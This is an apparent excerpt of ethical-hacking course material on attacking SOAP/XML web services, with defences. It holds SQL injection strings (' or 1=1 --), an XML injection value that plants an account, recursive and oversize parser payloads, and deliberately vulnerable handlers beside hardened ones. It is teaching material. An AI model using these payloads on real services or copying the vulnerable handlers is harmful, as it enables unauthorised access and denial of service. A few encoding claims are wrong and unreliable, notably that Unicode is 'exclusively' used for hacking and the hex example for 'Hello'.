- In the first step, the attacker traps the WSDL document from web service traffic and analyzes it to determine the purpose of the application, its functional breakdown, entry points, and message types.
- The attacker then creates a set of valid requests by selecting a set of operations and formulating the request messages according to the rules of the XML Schema, so that they can be submitted to the web service.
- The attacker uses these requests to include malicious content in SOAP requests and analyzes the errors returned to gain a deeper understanding of potential security weaknesses.
- These attacks work similarly to SQL injection attacks: a single quote that reaches the backend query produces a database syntax error, and a verbose SOAP Fault hands that error straight back to the attacker.

In the slide's example, the attacker injects an arbitrary character (') into the name input field of the GetProductInformationByName operation:

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<SOAP-ENV:Envelope xmlns:SOAPSDK1="http://www.w3.org/2001/XMLSchema"
    xmlns:SOAPSDK2="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:SOAPSDK3="http://schemas.xmlsoap.org/soap/encoding/"
    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
  <SOAP-ENV:Body>
    <SOAPSDK4:GetProductInformationByName xmlns:SOAPSDK4="http://juggyboy/ProductInfo/">
      <SOAPSDK4:name>'</SOAPSDK4:name>
      <SOAPSDK4:uid>543</SOAPSDK4:uid>
      <SOAPSDK4:password>5648</SOAPSDK4:password>
    </SOAPSDK4:GetProductInformationByName>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

The server throws an error. The faultstring carries the backend exception and stack trace, which reveals the database access technology (OleDb), the shape of the query (productname like ... and providerid = ...), and the names of the server-side classes and methods:

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <soap:Body>
    <soap:Fault>
      <faultcode>soap:Server</faultcode>
      <faultstring>System.Web.Services.Protocols.SoapException: Server was unable to
        process request. ---> System.Data.OleDb.OleDbException: Syntax error (missing
        operator) in query expression 'productname like ''' and providerid = '...'.
        at System.Data.OleDb.OleDbCommand.ExecuteCommandTextErrorHandling(Int32 hr)
        ...
        at ProductInfo.ProductDBAccess.GetProductInformation(String productName, String uid, String password)
        at ProductInfo.ProductInfo.GetProductInformationByName(String name, String uid, String password)
        --- End of inner exception stack trace ---</faultstring>
      <detail />
    </soap:Fault>
  </soap:Body>
</soap:Envelope>

Figure: Web Services Probing Attacks
Web Service Attacks: SOAP Injection

- The attacker injects malicious query strings into the user input fields to bypass the web service's authentication mechanism and access backend databases.
- This attack works similarly to SQL injection attacks.

Simple Object Access Protocol (SOAP) is a lightweight, XML-based protocol designed to exchange structured and typed information on the web. The Envelope element is always the root element of a SOAP message. Because a SOAP web service usually hands the values it receives to a database query, an attacker who controls one of those values controls part of the query.

In the slide's example (service endpoint http://juggyboy.com/ws/products.asmx), the attacker submits the account login form with the user name % and the password ' or 1=1 or blah = 1. The client sends:

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<SOAP-ENV:Envelope xmlns:SOAPSDK1="http://www.w3.org/2001/XMLSchema"
    xmlns:SOAPSDK2="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:SOAPSDK3="http://schemas.xmlsoap.org/soap/encoding/"
    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
  <SOAP-ENV:Body>
    <SOAPSDK4:GetProductInformationByName xmlns:SOAPSDK4="http://juggyboy/ProductInfo/">
      <SOAPSDK4:name>%</SOAPSDK4:name>
      <SOAPSDK4:uid></SOAPSDK4:uid>
      <SOAPSDK4:password>' or 1=1 or blah = 1</SOAPSDK4:password>
    </SOAPSDK4:GetProductInformationByName>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

The password value closes the string literal in the server's query and appends or 1=1, so the WHERE clause is true for every row: the % wildcard matches any product name, and the service returns product data without valid credentials. Server response:

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <soap:Body>
    <GetProductInformationByNameResponse xmlns="http://juggyboy/ProductInfo/">
      <GetProductInformationByNameResult>
        <productId>25</productId>
        <productName>Painting101</productName>
        <productQuantity>3</productQuantity>
        <productPrice></productPrice>
      </GetProductInformationByNameResult>
    </GetProductInformationByNameResponse>
  </soap:Body>
</soap:Envelope>

Figure: SOAP Injection
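The probing step and the SOAP injection above, carried through end to end as an added example that is not part of the CEH material or of any real product service. A toy product web service is modelled in-process: it parses a SOAP request, builds the SQL query the way a vulnerable handler might (string concatenation), and answers with either a result or a SOAP Fault that leaks the database error; the hardened handler uses bound parameters and a generic fault. The service namespace is the one on the slide, but the SQLite schema, rows, and element names are constructed for the example. One difference from the slide: SQLite resolves column names when it prepares the statement, so the unknown column in ' or 1=1 or blah = 1 would itself raise an error here, and the example uses the comment form ' or 1=1 -- instead.

```python
"""Error-based probing and SOAP injection against a toy product service (added example)."""
import sqlite3
import xml.etree.ElementTree as ET

NS = "http://juggyboy/ProductInfo/"                  # namespace from the slide
SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"


def build_db():
    """Constructed backend: two products, each tied to a provider id and password."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products(productId INTEGER, productName TEXT,"
               " providerId TEXT, password TEXT)")
    db.executemany("INSERT INTO products VALUES (?,?,?,?)", [
        (25, "Painting101", "543", "5648"),
        (26, "Sculpture7", "544", "9999"),
    ])
    return db


def soap_request(name, uid, password):
    """Client side: the message a script or soapUI would send for the operation."""
    return (f'<s:Envelope xmlns:s="{SOAP_ENV}"><s:Body>'
            f'<p:GetProductInformationByName xmlns:p="{NS}">'
            f'<p:name>{name}</p:name><p:uid>{uid}</p:uid>'
            f'<p:password>{password}</p:password>'
            f'</p:GetProductInformationByName></s:Body></s:Envelope>')


def _params(xml_text):
    """Server side: pull the three operation parameters out of the envelope."""
    root = ET.fromstring(xml_text)
    op = root.find(f"{{{SOAP_ENV}}}Body/{{{NS}}}GetProductInformationByName")
    return {tag: (op.findtext(f"{{{NS}}}{tag}") or "")
            for tag in ("name", "uid", "password")}


def _fault(text):
    return ("<soap:Fault><faultcode>soap:Server</faultcode>"
            f"<faultstring>{text}</faultstring></soap:Fault>")


def handle_vulnerable(db, xml_text):
    """Concatenates SOAP parameters straight into SQL and echoes the DB error."""
    p = _params(xml_text)
    sql = (f"SELECT productId, productName FROM products WHERE productName LIKE '{p['name']}' "
           f"AND providerId = '{p['uid']}' AND password = '{p['password']}'")
    try:
        rows = db.execute(sql).fetchall()
    except sqlite3.Error as exc:           # a lone quote lands here: verbose fault
        return {"fault": _fault(f"{type(exc).__name__}: {exc}"), "rows": []}
    return {"fault": None, "rows": rows}


def handle_hardened(db, xml_text):
    """Same operation with bound parameters and a fault that leaks nothing."""
    p = _params(xml_text)
    try:
        rows = db.execute(
            "SELECT productId, productName FROM products WHERE productName LIKE ? "
            "AND providerId = ? AND password = ?",
            (p["name"], p["uid"], p["password"])).fetchall()
    except sqlite3.Error:
        return {"fault": _fault("Server was unable to process request."), "rows": []}
    return {"fault": None, "rows": rows}


if __name__ == "__main__":
    db = build_db()
    print("probe   :", handle_vulnerable(db, soap_request("'", "543", "5648"))["fault"])
    print("inject  :", handle_vulnerable(db, soap_request("%", "", "' or 1=1 --"))["rows"])
    print("hardened:", handle_hardened(db, soap_request("%", "", "' or 1=1 --"))["rows"])
```

The probe request returns a fault naming the exception class and the token SQLite choked on, which is exactly the signal the probing step looks for; the injected password then returns every product without a valid provider id or password. Against the hardened handler the same two messages yield an empty result and, for genuinely malformed input, a fault with no database detail.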
Web Service Attacks: XML Injection

- Attackers inject XML data and tags into user input fields to manipulate the XML schema or populate an XML database with bogus entries.
- XML injection can be used to bypass authorization, escalate privileges, and generate web service DoS attacks.

An XML injection attack is the process in which the attacker enters values that are written into or queried against XML, crafted so that the XML structure itself changes. When the server assembles a record by concatenating user input into an XML document, input that contains closing and opening tags is interpreted as markup rather than as data.

In the slide's example the server stores accounts in an XML file:

<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
  <user>
    <username>gandalf</username>
    <password>!c3</password>
    <userid>101</userid>
    <mail>gandalf@middleearth.com</mail>
  </user>
  <user>
    <username>Mark</username>
    <password>12345</password>
    <userid>102</userid>
    <mail>mark@certifiedhacker.com</mail>
  </user>
</users>

The attacker registers with the user name Mark and the password 12345, but submits the following value in the Mail field of the account login form:

mark@certifiedhacker.com</mail></user><user><username>jason</username><password>attack</password><userid>105</userid><mail>jason@juggyboy.com

The server-side code appends the new record without escaping the input, so the stored file now also contains a complete second record that the attacker chose every field of:

  <user>
    <username>jason</username>
    <password>attack</password>
    <userid>105</userid>
    <mail>jason@juggyboy.com</mail>
  </user>

This creates a new user account on the server. Because the attacker also picks the userid, an application that derives privileges from that value (for example a reserved administrator range) can be tricked into granting them.

Figure: XML Injection
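The XML injection above, reproduced as an added example that is not part of the CEH material. The vulnerable function concatenates the registration fields into the XML user store the way the slide's server-side code does, so a Mail value carrying closing and opening tags appends a second record with attacker-chosen fields; the hardened function builds the record with ElementTree, which escapes the angle brackets so the payload stays inert text. The user store contents and the account names are constructed for the example.

```python
"""XML injection into an XML-backed user store, vulnerable and hardened (added example)."""
import xml.etree.ElementTree as ET

# Constructed user store, matching the slide's layout (declaration omitted).
USERS_XML = """<users>
  <user><username>gandalf</username><password>!c3</password><userid>101</userid><mail>gandalf@middleearth.com</mail></user>
</users>"""

# Exactly what the attacker types into the Mail field of the registration form.
PAYLOAD = ("mark@certifiedhacker.com</mail></user>"
           "<user><username>jason</username><password>attack</password>"
           "<userid>105</userid><mail>jason@juggyboy.com")


def add_user_vulnerable(xml_text, username, password, userid, mail):
    """Builds the record by string formatting: input markup becomes structure."""
    record = (f"<user><username>{username}</username><password>{password}</password>"
              f"<userid>{userid}</userid><mail>{mail}</mail></user>")
    return xml_text.replace("</users>", record + "\n</users>")


def add_user_hardened(xml_text, username, password, userid, mail):
    """Builds the record through the XML API; '<', '>' and '&' are escaped on output."""
    root = ET.fromstring(xml_text)
    user = ET.SubElement(root, "user")
    for tag, value in (("username", username), ("password", password),
                       ("userid", str(userid)), ("mail", mail)):
        ET.SubElement(user, tag).text = value
    return ET.tostring(root, encoding="unicode")


def list_users(xml_text):
    """What the server later believes its user list is: (username, userid) pairs."""
    root = ET.fromstring(xml_text)
    return [(u.findtext("username"), u.findtext("userid")) for u in root.findall("user")]


if __name__ == "__main__":
    print("vulnerable:", list_users(add_user_vulnerable(USERS_XML, "Mark", "12345", 102, PAYLOAD)))
    print("hardened:  ", list_users(add_user_hardened(USERS_XML, "Mark", "12345", 102, PAYLOAD)))
```

With the vulnerable writer the store afterwards lists three accounts, the third (jason, userid 105) never having passed through registration; with the hardened writer Mark's mail field simply contains the literal payload, escaped, and only two accounts exist. Validating the mail field against its expected format before it is stored is the complementary control.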
Web Services Parsing Attacks

- Parsing attacks exploit vulnerabilities and weaknesses in the processing capabilities of the XML parser to create a denial-of-service condition or to generate logical errors in web service request processing.
- The attacker queries the web service with a grammatically correct SOAP document that contains deeply nested, recursive structures, so that processing it exhausts the XML parser and the CPU.
- Attackers send a payload that is excessively large in order to consume all system resources, rendering the web service inaccessible to other legitimate users.

A parsing attack succeeds when the attacker modifies the request so that the parser, rather than the application logic, becomes the bottleneck or the point of failure. The parser has to read and validate the whole document before the service can act on it, so a document engineered to be expensive to parse ties up memory and CPU on every request.

Recursive Payloads

XML can easily nest elements within a single document to represent complex relationships, and a parser must track every open element. An attacker queries the web service with a grammatically correct SOAP document that nests elements thousands of levels deep, resulting in exhaustion of the XML parser and CPU resources.

Oversize Payloads

XML is relatively verbose, so potentially large files must always be taken into consideration when protecting the infrastructure, and programmers should limit the accepted document size. Attackers send a payload that is excessively large to consume all system resources, rendering the web service inaccessible to other legitimate users.
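Both payload types from the slide, together with a pre-parse guard, as an added example that is not part of the CEH material. The generators build the recursive and oversize SOAP documents the slide describes; the guard streams the document with iterparse so it can reject excessive nesting before the full tree is built, caps the byte size, and refuses DOCTYPE and entity declarations (entity expansion is the other classic parser denial of service, not covered on the slide). The limits are constructed for the example; production values depend on the service's real message sizes.

```python
"""Recursive and oversize SOAP payloads with a streaming pre-parse guard (added example)."""
import io
import xml.etree.ElementTree as ET

SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"


def recursive_payload(depth):
    """Grammatically correct SOAP whose Body holds `depth` nested <x> elements."""
    return (f'<s:Envelope xmlns:s="{SOAP_ENV}"><s:Body>'
            + "<x>" * depth + "<x/>" + "</x>" * depth
            + "</s:Body></s:Envelope>").encode()


def oversize_payload(size):
    """A single text node padded until the message is roughly `size` bytes."""
    return (f'<s:Envelope xmlns:s="{SOAP_ENV}"><s:Body><data>'
            + "A" * size + "</data></s:Body></s:Envelope>").encode()


def check_payload(data, max_bytes=64 * 1024, max_depth=32):
    """Returns (accepted, reason); hostile documents are rejected before a full parse."""
    if len(data) > max_bytes:
        return False, f"oversize: {len(data)} bytes > {max_bytes}"
    if b"<!DOCTYPE" in data or b"<!ENTITY" in data:
        return False, "DTD/entity declarations not accepted"
    depth = 0
    try:
        # iterparse feeds the parser incrementally, so we can stop at the
        # first element that exceeds the depth budget instead of building
        # the whole tree in memory.
        for event, _ in ET.iterparse(io.BytesIO(data), events=("start", "end")):
            if event == "start":
                depth += 1
                if depth > max_depth:
                    return False, f"recursive: depth exceeds {max_depth}"
            else:
                depth -= 1
    except ET.ParseError as exc:
        return False, f"malformed: {exc}"
    return True, "ok"


if __name__ == "__main__":
    for label, doc in (("normal", recursive_payload(3)),
                       ("recursive", recursive_payload(5000)),
                       ("oversize", oversize_payload(200_000))):
        print(f"{label:10s}", check_payload(doc))
```

The guard belongs in front of the web service framework's own parser, because that parser is the component the attack targets; checking the size and depth budget on the raw bytes costs one pass and protects every operation behind the endpoint.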
Web Service Attack Tool: soapUI

Source: http://www.soapui.org

soapUI is an open source functional testing tool, mainly used for web service testing. It supports multiple protocols such as SOAP, REST, HTTP, JMS, AMF, and JDBC. It enables you to create advanced performance tests very quickly and to run automated functional tests. With the help of this tool, attackers can easily perform web services probing, SOAP injection, XML injection, and web services parsing attacks: it loads a WSDL, generates a request for every operation it describes, and lets the tester edit and resend each request and inspect the raw response.

Figure: soapUI Tool Screenshot (a sample-service project loaded from its WSDL, with the generated request for the buy operation, the request properties, and the WSDL content and message definitions visible)
Web Service Attack Tool: XMLSpy

Source: http://www.altova.com

Altova XMLSpy is the XML editor and development environment for modeling, editing, transforming, and debugging XML-related technologies. It offers a graphical schema designer, SmartFix validation, a code generator, file converters, debuggers, profilers, full database integration, and support for WSDL, SOAP, XSLT, XPath, XQuery, XBRL, and Open XML documents, plus Visual Studio and Eclipse plug-ins, and more. Its WSDL and SOAP support is what makes it useful in this phase: a captured WSDL can be opened, SOAP requests created from it, and each message edited and validated against the schema before it is sent to the service.

FIGURE 13.57: XMLSpy Tool Screenshot (the XSLT debugger stepping through TheAgencyR3.xslt, with the call stack, XPath watch, and XSL output panes visible)
Module Flow

So far, we have discussed web application concepts, the threats associated with web applications, and the hacking methodology. Now we will discuss hacking tools. These tools help attackers retrieve sensitive information and craft and send malicious packets or requests to the victim. Web application hacking tools are especially designed for identifying vulnerabilities in web applications; with their help, the attacker can easily exploit the identified vulnerabilities and carry out web application attacks.

Module flow: Web App Concepts, Web App Threats, Hacking Methodology, Web Application Hacking Tools (this section), Countermeasures, Security Tools, Web App Pen Testing.

This section lists and describes various web application hacking tools such as Burp Suite Professional, CookieDigger, WebScarab, and so on.
Web Application Hacking Tool: Burp Suite Professional

Source: http://www.portswigger.net

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work together to support the entire testing process, from initial mapping and analysis of an application's attack surface through to finding and exploiting security vulnerabilities. Burp Suite contains key components such as an intercepting proxy, an application-aware spider, an advanced web application scanner, the Intruder tool, the Repeater tool, the Sequencer tool, and others.

Figure: Burp Suite Professional Tool Screenshot (the Intruder tab with a captured HTTP GET request, its payload positions marked, and the attack results table listing each request's status and response length)
189 * Ethical Hacking and C ounterm easures Web Application Hacking Tool: CookieDigger CEH j J J CookieDigger helps id e n tify weak cookie genera tio n and insecure im p le m e n ta tio n s o f session m anagem ent by web applications It works by collecting and analyzing cookies issued by a web application for m ultiple users The to o l reports on th e p re d icta b ility and e n tro p y o f th e cookie and w h e th er critical in fo rm a tio n, such as user nam e and password, are included in th e cookie values Foundstone Cookie Digger F o u n d s to n e C oo kied igg er '/*tea URLs com /ווק.* i/vimן 31 accounts gootfe coro/seracelogn Aih ', m»l.google.conz_,'na»-1t*1c/_/)s./>mr.lrj11f1*ai1er»x04lwi$a»st.«n /rv'*1/ https y/tnal.google oorvmalavo.ai 28v1ew*«ptver^hrt4nw»*r4 https :/msi google cwn/vnahi/uaj «2hin»^aplw nchm > 6 t14 https cttiu / / M 1 4 https y/w»l.google corvm»l'u/q/'vw 1 https.avnsi google axn/_/'1nad *tat1c/_/i«/^mn/»1jt«4v vaf»x0wke»e4c an https //hi! gosgl u/o.'^j»יז*/ con 2>v»w<)«p',1 https y/w»l.g00gl*.c«ffv,m»l U/0.,J 24vww<«plvar*chfiHrw&-tr hflps //Vnal google co«n/n>ala^0-'>j«28vtew^>spuw <1W*rwQ*ty 4< https //h»«l google co!natwlaj/t)aj*ft1rtt1y«c fts/amk\jpdt HardAdnwvhtir /httpy/maim.oom http //WWW r convlognvtrfy y c http y/m*l r.o0ffvr*wm»(atand«tphp>»^d*u^ about War* http //hotmatl/ http y/ww*.f>otm»l com/ et f_soace «tnp v.3a"2. F 2 ffrai.. ' j d f n (jw d»* ** p»e tn! gt>3gl» com/tnsl'u/oaj «Back Mod > http :// cafee.com C o p y r ig h t b y EC-Cauactl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. W e b A p p l i c a t i o n H a c k i n g T o o l : C o o k i e D i g g e r S ource: h ttp ://w w w.m c a fe e.c o m C o o kie D ig g e r is a to o l th a t d e te c ts v u ln e ra b le co o kie g e n e ra tio n and th e in se cure im p le m e n ta tio n o f session m a n a g e m e n t by w e b a p p lic a tio n s. 
The tool is based on collecting and evaluating the cookies a web application issues to many users. The predictability and entropy of the cookie are the factors on which the tool's assessment relies. It also checks whether the cookie values contain sensitive information such as the user's login details (user name and password).
[Figure: Foundstone CookieDigger screenshot showing the visited URLs, the captured POST data of a login form, and the User ID and Password fields extracted from it]

FIGURE: CookieDigger Tool Screenshot
Web Application Hacking Tool: WebScarab

- WebScarab is a framework for analyzing applications that communicate using the HTTP and HTTPS protocols
- It allows the attacker to review and modify requests created by the browser before they are sent to the server, and to review and modify responses returned from the server before they are received by the browser

[Figure: WebScarab Summary tab showing the tree view and conversation list (URL, method, status, Set-Cookie, comments, scripts) for http://www.owasp.org:80/]

Web Application Hacking Tool: WebScarab

Source: http://www.owasp.org

WebScarab is a framework for analyzing applications that communicate using the HTTP and HTTPS protocols.
It is written in Java, and is thus portable to many platforms. WebScarab has several modes of operation, implemented by a number of plugins. It operates as an intercepting proxy, allowing the attacker to review and modify requests created by the browser before they are sent to the server, and to review and modify responses returned from the server before they are received by the browser. It is able to intercept both HTTP and HTTPS communication. The operator can also review the conversations (requests and responses) that have passed through WebScarab.
[Figure: WebScarab screenshot of the Summary tab with the conversation list (ID, date, method, host, path, parameters, status, origin) for requests to http://www.owasp.org:80/]

FIGURE: WebScarab Tool Screenshot
Web Application Hacking Tools

A few more tools that can be used for hacking web applications are listed as follows:

- Instant Source, available at http://www.blazingtools.com
- w3af, available at http://w3af.sourceforge.net
- GNU Wget, available at http://gnuwin32.sourceforge.net
- BlackWidow, available at http://softbytelabs.com
- curl, available at http://curl.haxx.se
- HttpBee, available at http://www.o0o.nu
- Teleport Pro, available at http://www.tenmax.com
- WebCopier, available at http://www.maximumsoft.com
- HTTrack, available at http://www.httrack.com
- MileSCAN ParosPro, available at http://www.milescan.com
Module Flow

[Figure: module flow diagram with the sections Web App Concepts, Web App Threats, Hacking Methodology, Web Application Hacking Tools, Countermeasures, Security Tools, and Web App Pen Testing]

So far, we have discussed various concepts such as the threats associated with web applications, hacking methodology, and hacking tools. All these topics describe how the attacker breaks into a web application or a website. Now we will discuss web application countermeasures. Countermeasures are the practice of using multiple security systems or technologies to prevent intrusions. They are the key components for protecting and safeguarding the web application against web application attacks.
This section highlights various ways in which you can defend against web application attacks such as SQL injection attacks, command injection attacks, XSS attacks, etc.
Encoding Schemes

- Web applications employ different encoding schemes for their data to safely handle unusual characters and binary data in the way you intend
- URL encoding is the process of converting a URL into valid ASCII format so that data can be safely transported over HTTP
- URL encoding replaces unusual ASCII characters with "%" followed by the character's two-digit ASCII code expressed in hexadecimal, such as %3d (=), %0a (newline), %20 (space)
- An HTML encoding scheme is used to represent unusual characters so that they can be safely combined within an HTML document
- It defines several HTML entities to represent certain characters

Encoding Schemes

The HTTP protocol and the HTML language are the two major components of web applications. Both components are text based. Web applications employ encoding schemes to ensure that both components handle unusual characters and binary data safely. The encoding schemes include:

URL Encoding

URLs are permitted to contain only the printable characters of the ASCII code within the range 0x20 to 0x7e inclusive. Several characters within this range have a special meaning when they appear in the URL scheme or the HTTP protocol. Hence, such characters are restricted. URL encoding is the process of converting URLs into valid ASCII format so that data can be safely transported over HTTP.
URL encoding replaces unusual ASCII characters with "%" followed by the character's two-digit ASCII code expressed in hexadecimal, such as:

- %3d  =
- %0a  newline
- %20  space
HTML Encoding

The HTML encoding scheme is used to represent unusual characters so that they can be safely entered within an HTML document as part of its content. The structure of the document is defined by various characters. If you want to use the same characters as part of the document's content, you may face a problem. This problem can be overcome by using HTML encoding. It defines several HTML entities to represent certain characters such as:

- &amp;  &
- &lt;  <
- &gt;  >
Encoding Schemes (Cont'd)

Base64 Encoding
- The Base64 encoding scheme represents any binary data using only printable ASCII characters

Hex Encoding
- The hex encoding scheme uses the hex value of every character to represent a collection of characters for transmitting binary data
- Example: Hello A125C458D8, Jason 123B684AD9

Encoding Schemes (Cont'd)

Unicode Encoding

Unicode is a character encoding standard that is designed to support all of the writing systems used in the world. Unicode is exclusively used to hack web applications. Unicode encoding helps attackers to bypass the filters.

16-bit Unicode encoding: It replaces unusual Unicode characters with "%u" followed by the character's Unicode code point expressed in hexadecimal:

- %u2215  /
- %u00e9  é

Base64 Encoding

Base64 schemes are used to encode binary data. A Base64 encoding scheme represents any binary data using only printable ASCII characters. Usually it is used for encoding email attachments for safe transmission over SMTP and also for encoding user credentials.

Example: cake, Base64 encoding:

Hex Encoding

A hex encoding scheme uses the hex value of every character to represent a collection of characters for transmitting binary data.

Example: Hello A125C458D8, Jason 123B684AD9

UTF-8

It is a variable-length encoding standard that uses each byte expressed in hexadecimal and preceded by the % prefix:

- %c2%a9
- %e2%89%a0

TABLE: Encoding Schemes Table
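The encoding schemes above matter to a defender because a filter that inspects the raw request sees "%3C" or "%u00e9" rather than the character the server will actually process. The following canonicalizer, an added example and not code from the module, decodes %uXXXX escapes, URL percent-encoding (including multi-byte UTF-8 sequences such as %c2%a9), HTML entities and compatibility characters before any validation runs; the forbidden-character set and the three-round limit are assumptions chosen for the demonstration.

```python
import html
import re
import unicodedata
from urllib.parse import unquote

# Added example, not code from the EC-Council module. It reverses the encoding
# schemes the module lists (URL %xx, 16-bit Unicode %uXXXX, UTF-8 byte
# sequences such as %c2%a9, HTML entities) so that input validation sees the
# real characters instead of an encoded disguise. FORBIDDEN and max_rounds are
# assumptions chosen for this demonstration.

_PERCENT_U = re.compile(r"%u([0-9a-fA-F]{4})")


def decode_percent_u(value: str) -> str:
    """Turn %uXXXX escapes (e.g. %u00e9) into the code points they name."""
    return _PERCENT_U.sub(lambda m: chr(int(m.group(1), 16)), value)


def canonicalize(value: str, max_rounds: int = 3) -> str:
    """Decode one layer at a time until the value stops changing.

    Each round applies, in order: %uXXXX decoding, URL percent-decoding
    (which also reassembles UTF-8 byte sequences like %c2%a9 into a single
    character), HTML entity decoding, and NFKC normalisation (which folds
    compatibility characters such as the fullwidth solidus U+FF0F onto '/').
    The round limit keeps a pathological input from looping forever; a
    double-encoded value such as %253C needs two rounds to reach '<'.
    """
    for _ in range(max_rounds):
        decoded = decode_percent_u(value)
        decoded = unquote(decoded)
        decoded = html.unescape(decoded)
        decoded = unicodedata.normalize("NFKC", decoded)
        if decoded == value:
            break
        value = decoded
    return value


# Characters that the example's search-term field is never allowed to carry.
FORBIDDEN = frozenset("<>\"'/\\;")


def contains_forbidden(value: str) -> bool:
    """Validate on the canonical form, never on the raw encoded string."""
    return any(ch in FORBIDDEN for ch in canonicalize(value))


if __name__ == "__main__":
    for sample in ("%u00e9", "%3Cscript%3E", "%253Cscript%253E",
                   "&lt;script&gt;", "%c2%a9", "%uff0f"):
        print(f"{sample!r:22} -> {canonicalize(sample)!r}")
```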
How to Defend Against SQL Injection Attacks

To defend against SQL injection attacks, several things have to be taken care of: unchecked user input must not be allowed to pass into database queries. Every user variable passed to the database should be validated and sanitized. The given input should be checked against the expected data type. User input that is passed to the database should be quoted.

- Limit the length of user input
- Use custom error messages
- Monitor DB traffic using an IDS, WAF
- Disable commands like xp_cmdshell
- Isolate the database server and the web server
- Always use the method attribute set to POST
- Run the database service account with minimal rights
- Move extended stored procedures to an isolated server (Microsoft SQL Server)
- Use typesafe variables or functions such as IsNumeric() to ensure type safety
- Validate and sanitize user inputs passed to the database
- Use a low privileged account for the DB connection
How to Defend Against Command Injection Flaws

The simplest way to protect against command injection flaws is to avoid them wherever possible. Some language-specific libraries perform identical functions for many shell commands and some system calls. These libraries do not invoke the operating system shell interpreter, and so avoid most shell command problems. For those calls that must still be used, such as calls to backend databases, one must carefully validate the data to ensure that it does not contain malicious content. One can also structure requests in a pattern that ensures that all given parameters are treated as data instead of potentially executable content. Most system calls, and the use of stored procedures with parameters that accept valid input strings to access a database, or prepared statements, provide significant protection, ensuring that the supplied input is treated as data; this reduces, but does not completely eliminate, the risk involved in these external calls. One can always validate the input to ensure the protection of the application in question. Least privileged accounts must be used to access a database so that there is the smallest possible loophole. The other strong protection against command injection is to run web applications with only the privileges required to carry out their functions. Therefore, one should avoid running the web server as root, or accessing a database as DBADMIN, or else an attacker may be able to misuse administrative rights. The use of the Java sandbox in the J2EE environment stops the execution of system commands.
The use of an external command requires thoroughly checking any user information that is inserted into the command. Create a mechanism for handling all possible errors, timeouts, or blockages during the calls. To ensure that the expected work is actually performed, check all the output, return, and error codes from the call. At the least this allows the user to determine if something has gone wrong. Otherwise, an attack may occur and never be detected.

- Perform input validation
- Use language-specific libraries that avoid problems due to shell commands
- Use a safe API that avoids the use of the interpreter entirely
- Use parameterized SQL queries
- Escape dangerous characters
- Perform input and output encoding
- Structure requests so that all supplied parameters are treated as data, rather than potentially executable content
- Use modular shell disassociation from the kernel
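The SQL injection and command injection defenses above share one idea: the supplied value must reach the database or the operating system as data, never as syntax. This added example (not code from the module) shows a concatenated query beside its parameterized form, an IsNumeric()-style type check, and a lookup helper that validates a hostname and builds an argument vector for a safe process API instead of a shell command line; the users table, the hostname rule and the nslookup helper are constructed for the demonstration.

```python
import re
import sqlite3
import subprocess

# Added example, not code from the EC-Council module. The same user-supplied
# value is handled two ways: spliced into a query or command string
# (vulnerable) versus passed as a parameter so the database driver or the
# process API treats it strictly as data (hardened). The users table, the
# hostname pattern and the nslookup helper are constructed assumptions.


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table with a handful of sample accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user"), ("carol", "user")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    # String concatenation: quote characters inside `name` become SQL syntax,
    # so a crafted name rewrites the WHERE clause instead of matching a row.
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn: sqlite3.Connection, name: str) -> list:
    # Parameterised query: the driver binds the value, which can only ever be
    # compared against the column and is never parsed as part of the statement.
    rows = conn.execute("SELECT name FROM users WHERE name = ?", (name,))
    return [row[0] for row in rows]


def lookup_by_id_safe(conn: sqlite3.Connection, raw_id: str) -> list:
    # Type-safety check in the spirit of IsNumeric(): reject anything that is
    # not a plain integer before it goes anywhere near the query.
    if not raw_id.isdigit():
        raise ValueError("id must be numeric")
    rows = conn.execute("SELECT name FROM users WHERE rowid = ?", (int(raw_id),))
    return [row[0] for row in rows]


# Allow-list for hostnames: letters, digits, dots and hyphens only (assumption).
HOSTNAME_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?")


def build_lookup_argv(host: str) -> list:
    """Validate the hostname and return an argument vector for subprocess.

    Passing a list (and never shell=True) means no shell interpreter is
    involved: characters such as ';' or '|' would reach the program as
    literal text, and the allow-list rejects them before that anyway.
    """
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError("invalid hostname")
    return ["nslookup", host]


def run_lookup(host: str) -> str:
    """Run the lookup through the safe API: argument list, no shell, a timeout,
    and the return code available for the caller to check."""
    result = subprocess.run(build_lookup_argv(host), capture_output=True,
                            text=True, timeout=10, check=False)
    return result.stdout


if __name__ == "__main__":
    conn = make_db()
    print(lookup_safe(conn, "alice"))
    print(build_lookup_argv("example.com"))
```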
How to Defend Against XSS Attacks

- Validate all headers, cookies, query strings, form fields, and hidden fields (i.e., all parameters) against a rigorous specification
- Use testing tools extensively during the design phase to eliminate such XSS holes in the application before it goes into use
- Encode input and output and filter meta characters in the input
- Do not always trust websites that use HTTPS when it comes to XSS
- Use a web application firewall to block the execution of malicious script
